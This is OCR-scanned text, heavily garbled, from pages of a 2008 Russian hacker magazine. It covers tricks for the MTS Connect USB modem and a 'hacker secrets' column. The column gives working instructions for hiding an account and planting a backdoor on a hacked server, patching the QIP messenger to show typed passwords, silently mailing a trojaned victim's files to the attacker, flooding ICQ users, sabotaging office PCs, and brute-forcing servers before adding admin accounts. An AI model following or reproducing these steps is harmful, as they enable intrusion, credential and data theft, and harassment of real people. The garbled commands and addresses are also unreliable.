показывается, если ты кликнул на имени человека, страница которого 
удалена или утебя нет к ней доступа. 



ТРИК9: 



ВОССТАНАВЛИВАЕМ ПАРОЛЬ ИЗ КУКИСОВ 

Сохраненный пароль можно откопать и в кукисах, а чтобы не делать это 
вручную, пригодится тулзаѴКопІакІеСоокіеРаззѵѵогсІРесоѵегу. Она 

автоматически находит соокіев сайта «Вконтакте» в установленных 
Іпіегпеі Ехріогег, Рігеіох, Орега, 5а(агі и пытается вытащить из них па- 
роль путем поиска соответствующего МРб-хэша пароля в онлайн-базах 
асіафопііпе.сот и развсгаскіпа.ги . Программа используетсобственный 
механизм «извлечения» информации из файлов соокіев всех указанных 
браузеров, что не всегда гарантирует 100% результат при их анализе 
(исправляется по мере поступления информации о найденных багах), но 
зато работаеточеньбыстро. ЗС 



Проекторы Ерзоп. Новая реальность! 




Кино, компьютерные игры и любимые 
ТВ-передачи на экране размером во всю стену! 
С проектором Ерзоп у Вас дома! 
Большой экран, качественное изображение, 
комфортный просмотр без усталости глаз - 
полное погружение в действие на экране. 



^ ■ I 

Экран до 7 м 1 000 000 000 

(диагональ 300") цветов 



РиІІНй 

1080 р 



^ от 19 950 рублей* 

РІ.ГО • Реюжщошнм рентная цена для модели ЕРШ ЕМР-йЮ 




Узнайте больше на ѵѵѵѵѵѵ.ерзоп.ги 




ЕР50ІМ 

ЕХСЕЕй ѴОІІВ ѴІ5ІОМ 



Москва: Розіегдгоир (495) 921-47-47 • ДеЛайт2000 (495) 225-225-8 • Имидж.Ру (495) 737-37-27 • Лазерный Мир (495) 913-51-82 • ОнЛайн Трейд (495) 737-47-48 • Цифровые Системы (495) 787-44-88 • Роіагіз (495) 755-55-57 
ВЗІ (495) 514-14-19 • ЗІагШазІег (495) 785-85-55 • Полимедиа (495) 956-85-81 • Техносила (495) 777-87-77 • Астрахань: ТАН (8512) 39-42-54 Барнаул: ГАЛЭКС (3852) 65-38-01 Белгород: Инфотех (4722) 26-36-18 
Благовещенск: А-Эл-Джи Софт (4162) 52-22-60 Воронеж: Рет (4732) 77-93-39 Екатеринбург: Трилайн (343) 378-70-70 Иркутск: ѴЮ МЕОІА (3952) 53-39-19 Казань: Дарфф (843) 299-71-24 Калининград: Ноітгоск 
(4012) 57-28-57 • Махітиз (4012) 300-350 Краснодар: Владос (861) 210-10-01 Курск: ФИТ (4712) 51-25-01 Минск: АІІѴізіоп (017) 237-45-90 • Белана (017) 207-81-18 • ПринтЛюкс (017) 216-19-22 Набережные Челны: 
Форт Диалог (8552) 59-92-20 • Элекам (8552) 59-82-33 Н. Новгород: Домашний компьютер (831) 277-82-92 • Юст (831) 230-16-74 Новосибирск: ГОТТИ (383) 362-00-44 • НЭТА (383) 304-10-10 • Техносити (383) 332-41-63 
Омск: РИТМ (3812) 23-65-27 Пермь: Гармония (342) 212-11-66 Ростов-на-Дону: С0МР1ЯЕК - СІТУ (863) 295-03-33 • ЗТѴШ5 (863) 240-59-67 • Офисный Мир КМ (863) 253-65-00 Самара: ПРАГМА (846) 270-17-01 
Санкт-Петербург: БМК (812) 232-4012 • Викинг (812) 293-30-03 • КЕЙ (812) 074 • Компьютерный Мир (812) 333-00-33 Саратов: КомпьюМаркет (8452) 50-40-40 Уфа: Кламас (347) 291-21-12 • Форте-ВД (347) 260-00-00 
Хабаровск: Гермес (412) 31-55-57 Ярославль: Тензор (4852) 406-400 
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ВАСИЛИИ ЛЕНСКИІ 




СОЫЫЕСТЕО! 



МТС продает модем в со 
ставе услуги МТС Коннект 
всего за 3790 рублей, в то 
время как отдельно этот 
модем в магазинах стоит 
около 7000 р. 



НЕСТАНДАРТНЫЕ ТРЮКИ ПРИ ИСПОЛЬЗОВАНИИ МОДЕМА МТС КОННЕКТ 



комплект входит очень полезный девайс - полноценный 30-модем. И хотя| 
керской точки зрения и выяснить, на что оно действительно спосооно!^^И 



Модель самого девайса ни от кого не скрывается. В коробочке тебя 
ждет модем Ниаѵѵеі Е 220 , предназначенный для подключения к порту 
115В. Устройство, проверенное временем и заслужившее доверие со 
стороны многих пользователей: по всему миру распродано боль- 
шое количество как оригинальных Е 220 , так и его незначительных 
модификаций. Причина очевидна: при всей своей простоте девайс 
позволяет легко подключаться к инету, используя технологии 1ШТ5 [в 
том числе Н50РА), ЕР6Е, 6РВ5 и 65М. Технически это два устройства 
в одном: непосредственно модем и виртуальный СР-ВОМ, который 
автоматически монтируется в системе и позволяет тут же установить 
необходимые драйвера. Рчень удобно: никаких дисков ненужно, все 
зашито на встроенный 22 Мб диск. Впрочем, из устройства можно вы- 
жать намного больше, чем подключение на ноутбуке с установленной 
виндой. Приступим? 



ХАК №1 



'.ЗАПУСКАЕМ МОДЕМ ПОД ЫЫЫХ’ОМ 



Обычным пользователям предлагается использовать модем под виндой. 
ѴѴТР?Т.е. под никсами нам придется остаться без мобильного инета? 

Нифига! Да, в модеме действительно зашиты драй вера только для ѴѴІпсІомз и 
МАО, но это не значит, что его нельзя за пустить на других операционных систе- 
мах. Чтобы убедить тебя, расскажу, как наладить работу Е220 под Пингвином. 
Надо сказать, что само устройство отлично определяется и без твоей 
помощи: во время подключения модема оно автоматически монтируется 
как/беѵ/ііуІІЕВ, используя избзегіаі.ко [изЬзегіаІ-депегіс] интерфейс. 



Если же нет, значит, в твоей системе используется старое ядро (младше 
2.6.19) и придется скачать специальный драйвер, который доступен для 

за ка ч ки с са йта оозіе.( : т.іп1егіа.р[/рго/Ьиаѵѵеі-е220/ . 

Установить драйвер не сложнее, чем собрать самую обычную программу: 

баг хіѵЕ Ьиаиеі.баг .Ъг2 
$ ей Ьиаиеі 
$ зи 

# таке і п Го 

Последняя команда в зависимости от дистрибутива будет разной. 

Под ІІЬипіи это — таке ІПБІаІІ_иЬип1:и, под Мапбгаке — таке Іп5іа11_ 
тапбпѵа, ит.д. 

Далее, суверенностью, что нужные драйвера установлены в системе, 
можно приступать кнастройке соединения через программу ѵѵѵсііаі. 

Для того чтобы не прописывать длинную команду каждый раз, в конфиг 
файле /еГс/ѵѵѵбіаІ.сопІ прописывается «точка доступа»: 

[Біаіег Ьиаиеі] 

Мойет = /аеѵ/ССуицвО 
Ваий = 460800 
ІпіЫ = АТ 2 

Іпіб2 = АТОО VI Е1 30 = 0 йСІ Ы)2 +РСЬАЗЗ=0 
ІпібЗ = АТ+С0ВСШТ=І , "ІР" , "іпбегпеЬ.тбз.ги" 
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ХАКЕР 11 /119/ 08 











рс_гопе 




Статистика пере- 
данных и принятых 
данных под Ыпих'ом 




Важный этап настройки модема под 1_іпих: 
конфигурированиеутилиты ѵсііаі 




Интерфейс МТС Коннект для ѴѴіпсІоѵѵэ 



ІЗБЫ = О 

Біаі АССешрСз = 1 
Мосіет Туре = Б5В Мосіет 
РЪопе = *99# 

РЪопеІ = *99# 

Бзегпате = 'шСз 1 
Раззѵѵогсі = 'тСз' 

АиСо БЫЗ = оп 
Ыеѵ? РРРБ = уез 

Вот и все. Теперь, после набора в консоли команды ѵѵѵсііаі Ьиаѵѵеі (с 
помощью ключа Ьиаѵѵеі мы указываем название соединения, которое 
необходимо установить], подключение через Е220 будет установлено. 
Для того, чтобы его разорвать надо нажать <СМ>-С. 

Соединение соединением, но всегда приятно еще и знать, что в 
настоящий моменттворится с инет-каналом, а пока никакого визуаль- 
ного мониторинга у нас нет. Исправить это несложно, если установить 
небольшую тулзу [ Ьир://оо2ІеТт.іпІегіа.рі75гс/Ье2205ІаІТаг.Ь22 ]: 

Саг х^ѵб 1іе22 0зСаС . Саг .Ът.2 

ссі Ъе220зСаС* 

зисіо . /сопЕідиге 

зисіо таке 

зисіо таке іпзСаІІ 

ШД РАСШАРИВАЕМ ИНЕТ ЧЕРЕЗ ТОЧКУ ДОСТУПА 

Поскольку ЗВ - это уже полноценный интернет-канал, который, несмотря 
на свою мобильность, обеспечивает достойную скоростей небольшие 
задержки, то его часто используют как средство для постоянного доступа 
в интернет. К примеру на даче, где помимо спутниковой системы, 
никакой альтернативы нет. Прикольно подключить ЗВ-девайс кточке 
доступа, чтобы удобно расшарить канал на все компьютеры сети по ѴѴІ- 
Рі. И это возможно, если твоя точка доступа поддерживает подключения 
девайсов по 115В. Для эксперимента мы возьмем проверенный вариант 
— АвивѴѴІ-бООдР. Вбычно мы используем альтернативную прошивку 
от разработчика Оіед, но в этот раз мы будем использовать специаль- 
ную модификацию (родом из Чехии], специально адаптированную для 
подключения ІІ5В-модемов для работы через СБМА( зУ/корреІ. 
сг/ссІтаѵѵіб/сІоѵѵпІоагі/1691 . Последние версии бгтѵѵаге поддерживают 
Н II АѴѴ Е I Е220 по умолчанию, т.е. настраивать что-то дополнительно 
не понадобится. Вам процесс обновления прошивки выполняется за 
несколько минут (пункт меню Рігтѵѵаге ІІрдгабе]. После перезагрузкиу 
тебя в меню появится пункт 115В Воппесііоп, где нужно выбрать опцию 
ІІвег бебпесі и с помощью меню выбрать файл сйаі.биаѵѵеі.іаг.ді, который 
ты найдешь на нашем диске. Далее в меню выбери «115В соппесііоп -> 
Оіаі-ир Сопбд», где необходимо задать: 

ІІзегпате : шЬб 
Раззиогй: тСз 



АРЫ: іпСегпеЕ .тСз . ги 



Нажимай кнопку«Арр1у», затем «Ріпівб» — и точка доступа вновь пойдет 
на перезагрузку, после которой соединение с интернетом установится 
автоматически. 



М!І! 1 *І экономим деньги и время 

НА ИНТЕРНЕТ-ТРАФИКЕ 



Какими бы выгодными ни были тарифы, за активное пользование 
мобильным интернетом приходится немало платить. Приходится 
сдерживать себя, экономить, отключать картинки — словом, делать все, 
чтобы баланс неуходил в минус. Для того чтобы немного сэкономить 
и существенно прибавить в скорости, тебе необходимо использовать 
компрессоры трафика. За счетчего получается подобный эффект? 

Эти средства передают текст и графику в сжатом виде и за счет этого 
позвол я ют серьезно сократить объем передаваемых данных. Насколь- 
ко сильно получается экономить? В разы! Іоопеі.пеі- это типичный 
представитель таких компрессоров и, не в пример другим решениям, 
совершенно бесплатный. Утилита устанавливается в систему (поддер- 
живаются самые разные ОС] в качествелокального прокси, поэтому 
все сетевые программы нужно обязать отдавать данные через прокси- 
сервер: поумолчанию 127.0.0.1 :8080.Тоопе1.пеІэффеісгивножметвесь 
текстовый трафик, включая вложения в почте. Болеетого, принудитель- 
но сжимает изображения, в результате картинки получаются с заметно 
худшим качеством, но зато их не приходится отключать полностью! А 
значит, серфинг по-прежнему остается очень приятным. 



>У*'і'Л А Л ЬТЕР НАТИВНАЯ ПРОГРАММА 
ДЛЯ ПОДКЛЮЧЕНИЯ 



Встроенная утилита для подключения проста и довольно удобна, но для 
хакера ее возможностей явно недостаточно. Вместо стандартного МТ5 
Соппесіог можно попробовать использовать другую замечательную 
утилиту — МѴѴсопп [ цуууцу.т'л/сопп.сот ]. Она не привязана к конкретному 
оборудованию, поэтому работает с самыми разнообразными 30/0 РВ5- 
модемами. 

В итоге прямо на рабочем столеты можешь получить статистику в 
реальном времени по качеству канала, количеству использованного 
трафика, уровню сигнала и т.п. В программе можно настроить звуковые 
уведомления на случай, если изменится сеть (случай роуминга), сота или 
же сигнал опустится ниже критического значения. 

Для того чтобы непрерывно мониторить качество канала и при этом не 
тратитьлишнийтрафик, разработчики используютспециальный прием 
под названием «5тагІ Ріпд». Благодаря «умному пингу» проверяющие 
ІСМР-пакеты отправляются только тогда, когда есть подозрение, что 
канал «провис», не расходуя трафик понапрасну. Еще одна интересная 
опция -удаленноеуправление компьютером посредством входящих 
5М5-сообщений.Ты легко можешь настроить систему таким образом, 
чтобы сервер принудительно выполнил перезагрузку, если на модем 
придет сообщение с содержанием «геЬооі». 
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ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 



ЛЕОНИД «ВОЮ» ОТРОЙКОВ ЛЕОНИД «СРКЭѴѴЬЕВ» ИСУПОВ ВЛАДИМИР «ООТ.ЕНВ» САВИЦКИЙ 

/ ПОЮ@МДІЬ.Яи / / СПДѴѴІ.ЕЯНАСК@ПАМВ1.ЕП.Пи / / КДІГОГиГЕ@ВК.НІІ / 



Базу Наск} 



№1 

кЦ-ШШ МАКСИМАЛЬНО СКРЫТЬ СВОЕ ПРИСУТСТВИЕ НА ПОЛО- 
МАННОМ ДЕДИКЕ 

РЕШЕНИЕ: 

Вопросдолговечностиломанныхдедиков волнует многих. Никогда точно 
не знаешь, сколько проживеточередной сервер и какбыстро проснется 
его админ. Существует, однако, несколько заветных правил, следуя кото- 
рым, ты максимально продлишьжизньзахваченной машине. Итак: 

1. Если у тебя естьадминские права и возможность создать новый акка- 
унт в системе — непременно ей воспользуйся. Причем, созданный акк 
необходимо спрятать от посторонних глаз. Делается это так: запускаем 
НедЕбіі (ака редактор реестра], ищем ветку «НКЕУ_ЬОСАЬ_МАСНШЕ\ 
30РТИАКЕ\Місгозобб\ИіпсІоѵгз НТ\СиггепбѴегвіол\Иіп1одоп\ 
ЗресіаІАссоипРвХазегЬізб», создаем параметр ОѴѴОЕО и в качест- 
ве названия вбиваем имя нашего а кка, а значение указываем нулевое. 
Теперь внешне наш аккаунт не будет виден в системе. 

2. Следующий важный этап — патчинг Винды на предмет мульти юзер- 
ности. Касается исключительноѴѴІп ХР [ибо ѴѴіп 2к обладает подобной 
фичей по дефолту). Опять же, при наличии определенных прав сливаем 



патч (найдешь без труда в Гугле) и устанавливаем всистеме. 

3. При работе с доками и прочим файлом не забывай использовать стан- 
дартное виндовое скрытие файлов и папок. Это касается и дефолтных 
документов нашего созданного аккаунта, включая рабочий стол. Указы- 
ваем в атрибутах каталога «С: ХВоситепРз ап О Зеббіпдз\имя_юзе- 
ра» параметр «Скрытый» и наслаждаемся результатом. Теперьты совер- 
шенно свободно можешь кидать свое файло прямо на десктоп :). 

4. Старайся маски роватьсвои про- 
цессы в системе, а также запускать 
приложения в фоновом режиме. 

Кроме того, не напрягай сильно сам 
сервер, таккакнепомерные нагруз- 
ки на проциоперативу рано или 
поздно сдадуттебя с потрохами. 

5. На всякий случай, заранее за пусти 
тел нет-сервер (либо повесь в сис- 
теме бэкдор), предварительно под- 
корректировав настройки фаера. Это 
позволит тебе еще не раз вернуться к 
твоемулюбимомудедику, даже если 
админ заметиттвое присутствие 





{ 

// АсИгезз $649930 

} 



ЗАДАЧА: 



|ИСП0ЛЬЗУЯ ЕМ5501ШСЕ КЕ5СЦЕК, ОНУЛВС И НЕМНОГО 
СМЕКАЛКИ, МОДИФИЦИРОВАТЬСЯ ТАКИМ ОБРАЗОМ, ЧТОБЫ ОН 
ВЫДАВАЛ ВВЕДЕННЫЙ ПАРОЛЬ ПРИ ПОМОЩИ МЕ55А6ЕВ0ХА 
ЕЩЕ ДО ПРОЦЕДУРЫ АВТОРИЗАЦИИ 
РЕШЕНИЕ: 



Попробуем немного «распотрошить» внутренности дір, воспользовав- 
шисьуже наработанными навыками. 

1. Откроем файл дір.ехе в ЕМЗЭоигсе Певсиег-е для декомпиляции. Среди 
полученных программой форм и .срр-файлов найдем «тападег.срр», кото- 
рый, несомненно, является менеджером паролей (говорящее название!:)). 

2. Внутри файла тападег.срр содержится любопытная функция: 



Откроем файл дір.ехе под отладчиком и перейдем по полученному при 
помощи ЕМ5 Эоигсе Невсиегадресу (649936). Поставим здесьточку 
останова и запустим программу. 

3. Попробуем залогиниться и нажать кнопку «Ок». Программа ос- 
тановится на нашей точке останова. Отсюда начинается обработка 
введенных данных авторизации. Протрассируем программупо <Е8> до 
следующего момента: 

00649А01 САКЪ дір.004678В4 
00649А06 СМР ВДСЯШ РТЕ. 85: [ЕВР-8] ,0 
00649А0А ДЕ ВНОРТ 0649А2Р 



ѵоісі _Га:©Сса11 ТМапРогт: : ВиССопЬодіпІСІІск 
(ТОЬіесЬ *8епйег) 



Несложно догадаться (особенно, если выполнить этот код), что про- 
грамма обрабатывает данные аккаунта. В стеке по адресу [еЪр-8 ] 



► 048 



ХАКЕР 11 /119/ 08 




взлом 



>> 



будет содержаться парольучетной записи I СО ! Попробуем немного 
«дописать» код — таким образом, чтобы он выводил пароль при 
помощи МеззадеВох. Скопируем в буфер обмена при помощи ко- 
манды «Віпагу -> Віпагу сору» [правой кнопки мыши! машинный код 
двух инструкций, которые находятся, начиная с адреса 00649А06, и 
заменим их переходом к нашему коду. Он будет выводить окошко, по- 
казывающее пароль. Где мы расположим код, врядли длятебя будет 
секретом: в конце секции кода есть много свободного места (массив 
ноликов, предназначенный для выравнивания). Я выбрал базу 
для нашего кода, равняющуюся 0068Р83Е. По адресу 00 649А06 
располагай инструкцию ДМР 0068Р83Е. Следующим шагом станет 
написание кода, демонстрирующего пароль при помощи АРІ-функ- 
ции МеззадеВохА. Переходи к адресу 0068Е83Е и начнем ваять 
код. Первым делом вставим по этому адресу (при помощи «Віпагу^ 
Віпагу разіе») две инструкции, которые мы заменили безусловным 
переходом ранее. 

4. Начиная с адреса 0068Р844, располагаем передачу параметров 
для функции МеззадеВохА. Она принимает четыре значения, три 
из которых мы заменим нулями — нам они совершенно не интерес- 
ны. Нам важнотолько значение, которое соответствует содержимому 
выводимого окна. Соответствующий указатель на текст должен быть 
положен в стектретьим. Выше мы уже выяснили: по адресу ЕВР-8 
находится пароль, любезно предоставленный нам некой функцией, 
вызов которой располагается по адресу 00649А01. Набор парамет- 
ров для функции МеззадеВохА выглядит приблизительно так: 

0068Г844 РЬЗН 0 ; Стиль окна неважен — обнуляем 
0068Е846 РСТ8Н 0 ; заголовок окна — обнуляем 
0068Р848 РТ38Н ШОКЕ РТК 88: [ЕВР-8] ; текст окна - здесь 
будет пароль учетной записи 
0068Р84В РТІ8Н 0 ; владелец окна — обнуляем 

5. Завершаем код вызовом МеззадеВохА и переходом к инструк- 
ции, следующей сразу за переходом к написанному нами только что 
коду: 

О 0 6 8 Р 8 4 О САТіТ МеззадеВохА ; выводим пароль 
0068Р852 ЦМР 00649А0С ; передаем управление дір-у 

Вот и наш код целиком: 




Код, который коварно выдал пароль 



00649А06 ЦМР 0068Р83Е 

0068Е83Е СМР [ЕВР-8], О 
0068Е842 ЦЕ 0068Е867 
0068Е844 РОЗИ О 
0068Е846 РЬЗН О 
0068Р848 РЧЗН [ЕВР-8] 

0068Р84В РТ38Н О 
0068Р84П САЫ, МеззадеВохА 
0068Е852 ЦМР 00649А0С 

С охраняй про грамму под новым именем, запускай на выполнение и 
проверяй результат своего труда. К слову, вместо МеззадеВохА мо- 
жет вызываться и функция записи в файл, но это уже незаконно (как, 
собственно, и все действия, которые описываются в статье, если они 
ведут к реализации каких-то нехороших планов). Еще одна ремарка: 
цір проверяет собственную «нерушимость» и отказывается работать 
при модификации дір.ехе-файла. Нос этим справиться очень прос- 
то. Как? Разберешься! ;] 




АДАЧА: 



ЛЕГКО И БЫСТРО ПОЛУЧИТЬ ФАЙЛ ЖЕРТВЫ 



РЕШЕНИЕ: 



Итак, если ты не продвинутый кодер, а нужно быстро и без заморочек слить 
спротрояненного компалоги/пассы/еісдовсе, что для этого понадобится 
— аплоад и запуск маленького экзешника. Вся инфа прийдет прямо на мыло. 
І.Аплоад. Качаем юзверю бесплатную тулзу Ьтаіі. Это консольный 
почтовый клиент, весом всего 40 килобайт. 

2.3апуск. Удобнее всего запускать из батника (.Ьа(-файлы), хотя мож- 
ноизлюбойпроги, главное — с поддержкой передаваемых парамет- 
ров. Консольная команда выглядит так: 



Ьтаіі -з зтЕр . зегѵегі . ги -С коти@зегѵег2 . ги -Г оЕкодо® 
зегѵегЗ .ги -1 -а «Теша» 

— т «С : \Еі1е . ЕхЕ» -с 

Где: зтір. зегѵегі .ги — это любой почтовый сервер, не требующий 
авторизации. 

коти(азегѵег2.ги и оЕкодоИзегѵегЗ.ги — адреса получателя (твой) и 
отправителя (любой). 



СДЛІе.ІхІ — сам файл для отправки. Можно указать и номер 5МТР- 
порта, добавив параметр «-р <номер>», по дефолтуустановленный 
как 25. 

3. Если нужно помимо текстовой инфы получить файлы других фор- 
матов, пользуемся утилой траскібсі (26 килобайт), предварительно 
доставив ее юзверю. 

Запускаем: 



траск -з "Тета" -б Ьойу.ЬхЕ -с арріісаііоп/ехе -о Ьобу. 
тзд " с : \Еі1е . гаг " 

Ьтаіі -з зтЕр . зегѵегі . ги -С коти@зегѵег2 . ги -Е оЕкодо® 
зегѵегЗ .ги -Ь -т Ьобу.тзд 



Где Ьобу.іхі — необязательная 
текстовая часть письма, а «сЛГіІе. 
гаг» — файл любого типа для 
отправки. Он будетпреобразован 
в МІМЕ-формати послан через 
Ьтаіі. Единственное, что нам может 
помешать: хорошо настроенный 
файрвол, но его обход — это уже 
отдельная тема, которая неплохо 
освещена на просторах интернета. 



Тихая отправка 
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№4 

кУМЦЕІ ЗАФЛУДИТЬАСЮ НЕДРУГАС НЕСКОЛЬКИХ НОМЕРОВ 

РЕШЕНИЕ: 

В последнее время найти качественный и функциональный инструмент 
для флуда асек стало не так-то просто. Посему представляю твоему вни- 
манию достаточно удобное решение: 

1. Сливаем с нашего ДВДутилу под нехитрым названием «Ріоосіег» 
(респектавторуутилы — ВагТ'у). Тулза умеет показывать внутренний и 
внешний ІР-адрес пользователя, а также слать любое количество сооб- 
щений отлюбого номера — любому. 

2. Запускаем флудер и указываем любой собственный уин с паролем (либо 
указываем лишь пасс и жмем «Соппесі»— утила сама регнетнам номерок). 




3. Выбираем жертву, причем, уин жертвы должен быть в онлайне. 

4 . Указываем содержимое сообщения, а также тип: авторизация, сооб- 
щение л ибо уведомление о добавлении. 

Э.Жмем «Зіагі» и наслаждаемся логом флуда :). 

Не забывай, что спам — это плохо, а флуд — еще хуже. Есть способ защиты от 
подобного западла, но о нем я расскажу в следующем выпуске т. 




ЗАДАЧА 



^ЗАМУТИТЬ ОФИСНОЕ ЗАПАДЛО 

РЕШЕНИЕ: 



Мы собираемся на денек-другой освободить от работы офисного служа- 
щего или любого другого оператора ПК, перехватив запуск нужных ему 
прог. 

1. Находим на просторах Ьеѵопсйоаіс.ога ѵтилѵТгивИМоЕхе. 

2. Прога перехватываетзапусквсехехе-шников, выводя предупрежде- 
ние отом, что местный админ запретил использование <этого> приложе- 
ния и по всем вопросам обращаться к нему. Ставим прогу (займет около 5 
секунд) и, не перезагружая комп, в виндовой панельке управления ищем 
пункт«ТгивЫ\Іо-Ехе». 

3. Перед нами белый и черный списки — Ассевв и Оепу ІІ5І. В них можно 
добавлять папки, утилам из которых разрешен либо запрещен запуск. 

Не советую удал ять из белого списка папку с Виндой, прописанную по 
дефолту, если не охота угробить масдай. Лучше добавим туда все диски, 
которые есть на этом компе в виде «С:», «Б:», «Е:», «Р:» ит.д. В черный 
список добавляем папку с излюбленными прогами жертвы, пусть, для 
примера, это будет М5 ОІІІсе. Жмем Арріу и Ок. 

4 . Заходим в X: \ШШОНЗ\зузбет32\ТгизРКІоЕхе и наблюдаем файл 
«бепуехе.ехе». Именно его утила запускает вместо всехэкзешников из 



черного списка. При замене его на любой другой стаким же именем бу- 
дет запускаться наш новый. Признайся, уже появились коварные планы 
на тему«а что бы туда такого положить»? 

5 . Так как мы люди незлые, и хотим всего лишь пошутить, — рисуем/ка- 
чаем какую-нибудь веселую флешку на тему «делу время, потехе час» 
с расширением .ехе, переименовываем в «бепуехе.ехе» и заменяем 
оригинальный файл. 

6. Готово. Перезагружаем комп и отходим на безопасное расстояние. 

На отказ работать Ворда, Экселя, да и всего офиса, местный админ 
может отреагировать его переуста- 
новкой, но сути дела это не изменит: Я ДШУіМіМНИЦМІ 
по-прежнему будетзапускаться 
наша флешка с предложением 
отдохнуть. 

Вернуть все на свои места 
можно откатом системы на дату 
перед установкой ТгивШоЕхе 
через виндовое «Восстановле- 
ние системы» — либо удале- 
нием драйвера х: ХУШДХЖЗХ 
зузбет32\агіѵегз\Ыбгизб. 
зуз, либо отключением этого 
драйвера из раздела Огіѵег 
пункта «ТшвЫМо-Ехе» в панели 
управления ѴѴі п сіоѵѵз. 








Например: 

ірзсап.ехе 192.168.0.1 192.168.2.2 Іод.Ехр 



ЗАДАЧА: 



НАИТИ И СБРУТИТЬ ЗАБУГОРНЫЙ ДЕДИК 



РЕШЕНИЕ: 



Как известно, дедики нужны всем и всегда, именно поэтому иногда стоит 
заморочиться их поиском и брутом. Как правило, дедики ищут по откры- 
тым портам 135, 139 и 5900. Лучше всего придерживаться определенного 
алгоритма - 

1. Сливаем сканер ІРЭсап (либо берем с нашего ДВД). 

2 . Запускаем и указываем диапазон для скана, или создаем батнике 
содержимым: 



ірзсап.ехе начало_диапазона конегщиапазона имя_лога. 
рхр 



Тулза тут сканирует диапазон 192.168.0.1-192.168.2.2 и сохраняет резуль- 
тат в файл Іод.М. Кстати, ты запросто можешьуказывать сразу несколько 
желаемых диапазонов (для этогоудобнее всего юзатьописанный выше 
батник). 

3. Указываем набор сканируемых портов: 135, 139 и 5900 и запускаем скан. 

4 . После окончания сканирования в папке со сканером появится логе 
указанным тобой названием (в нашем случае — это Іод.іхД.Учти: если 
ты сканил сразу несколько диапазонов.тодля каждого диапазона будет 
создан отдельный файл слогом. 

5 . Послетого, какты получил лог, его необходимо отпарситьлибо 
вручную разбить на части в соответствии с портами: 135, 139 и 5900. Это 
нужно, чтобы в дальнейшем было удобнее составлять списки дедиков 
для брута. 
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6. Когда все готово — можно приступать к бруту. Разум- 
нее всего использовать тулзу ЫТвсап. Но помни, что эта 
утила брутит дедики на 135 и 139 портах. Для проверки 
5900 порта необходимо использовать софтину ѴІЧСтавв, 
которая позволит приконектиться к бажному дедику без 
авторизации. 

7 . Создаем новый аккаунт в системе (после того, как мы 
успешно сбрутили пасс на дедик при помощи ЫТвсап.либо 
подключились через ѴЫ С): 

стй 

пеЬ изег изег раззиогй /аскЗ 
пеЬ Іосаідгоир АсІтіпізСгабог изег /айй 
пеЬ Іосаідгоир "КетоЬе БезкЕор Чзегз" изег 
/айй 

пег ассоипрз /тахриаде : ипіітірей 
ехір 

где изег — наш логин, а раззѵѵогсі — соответственно, 
пароль. 

8. Успешно юзаем ломанные дедики :). 



Ищем дедики 

^ ■ . . 



№ {Іітг4 М) 

Р|*гф4 [ О 
Ниіглг* 



Ъ 






Гг Г* 



I Ѵд 












№7 

ПОЛУЧИТЬ ИСХОДНЫЙ КОД ПРИЛОЖЕНИЯ, НАПИСАННО- 
ГО НА ВОКІ.АЫО РЕІ.РНІ ИЛИ С++ ВШЮЕК 

РЕШЕНИЕ: 

Иногда случаются непредвиденные обстоятельства, и исходный код 
приложения оказывается утерян. К счастью, это не всегда означает, что 
придется переписывать проекте самого начала. Стоит воспользоваться 
одной из множества программ, предназначенных для восстановления 
частей кода скомпилированного приложения. Например, утилитой ЕМБ 
Зоигсе Ве5сиег. Если программа была скомпилирована в среде Вогіапсі 
йефЫ или С++ ВиіЫег, — есть шанс восстановить хотя бы каркас прило- 
жения (формы, модули данных проекта, включая свойства и события). 
Естественно, получить функциональный код процедур событий очень 
сложно (программа не имеет встроенного декомпилятора, да и сама 
задача восстановления кода в полном объеме кажется практически не- 
выполнимой). Но даже получение вышеописанного каркаса позволите 
два раза сократить время, необходимое для восстановления утерянного 
проекта. Что уж говорить о случаях, когда хочется немного покопаться в 
чужом коде? :) 

Рассмотрим процесс восстановления структуры форм программы, соб- 
ранной в С++Виі1бег'е на примере последней сборки известного всем 
интернет-пейджера ОІР. 

1. Запускаем БоигсеРевсиег.ехе, указываем ему путь к исследуемому 
файлу (цір.ехе) и нажимаем кнопку«Ыех)». 

2. Выбираем из списка форм в столбце слева необходимые нам и указы- 
ваем программе, в каком виде представлять выходную информацию (в 
формате ОеІрИІ или С++ Виіісіег]. 

3. Нажимаем «Ыехі» и получаем результат — десятки файлов, содержа- 
щих структуру форм и процедур. Следует отметить, что, хотя процедуры 
событий и не содержат кода, в комментариях внутри них расположен 
указатель на адрес кода, содержащегося в исполняемом файле. 

4 . Попробуем убедиться, что нас не обманывают, а адрес, который указан 
в комментарии внутри шаблона функции, действительно является 
указателем на необходимый код, расположенный в исполняемом файле. 
Откроем файл «аЬоиІІгт.срр», полученный при декомпилировании. 
Судя по всему, на его совести — выводлоготипа с версией билда (при 



запуске программы). Обрати внимание на процедуру, которая отвечает 
за создание формы: 



ѵоісЗ _ГазГса11 ТАЬоиЬРогт: :РогтСгеаГе (ТОЬпееС *8епйег) 
{ 

// Аййгезз $640160 
} 



Комментарий содержит адрес: 64С160. Открываем программу в ОНуйбд 
и загружаем в нее цір.ехе. Нажимаем <сІгІ+д> и переходим по адресу, 
полученному нами при помощи ЕМБ Зоигсе Везсиег. Как видишь, мы 
попали прямо на начало процедуры. Остается вопрос, процедура ли 
это вывода формы. Ставим точку останова и запускаем программу для 
проверки правильности теории. 

Действительно, при выводелого наш брякеработал! Этоуказываетна 
то, что адрес, полученный программой, верный, зс 



Все тайны квипа поведал нам ЕМББоигсе Вевсиег 

Вішмімшг і аѵііЯіД 
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ОБЗОР эксплойтов 



КОЛИЧЕСТВО КРИТИЧЕСКИХ ДЫР, ОБНАРУЖЕННЫХ В ѴѴІЫ00ѴѴ5 ЗА ПОСЛЕДНИЕ ДВА МЕСЯЦА, 
ПРОСТО ПОТРЯСАЕТ ВООБРАЖЕНИЕ — ГЛАЗА РАЗБЕГАЮТСЯ, НЕ В СИЛАХ ВЫБРАТЬ, КАКИМ УЯЗ- 
ВИМОСТЯМ ОТДАВАТЬ ПРЕДПОЧТЕНИЕ. К ТОМУ ЖЕ, ДЫР НАМНОГО БОЛЬШЕ, ЧЕМ КАЖЕТСЯ. С 
УЯЗВИМОСТЬЮ В ООІ+ АССОЦИИРОВАН ТОЛЬКО ОДИН БЮЛЛЕТЕНЬ БЕЗОПАСНОСТИ, НО ОШИБОК 
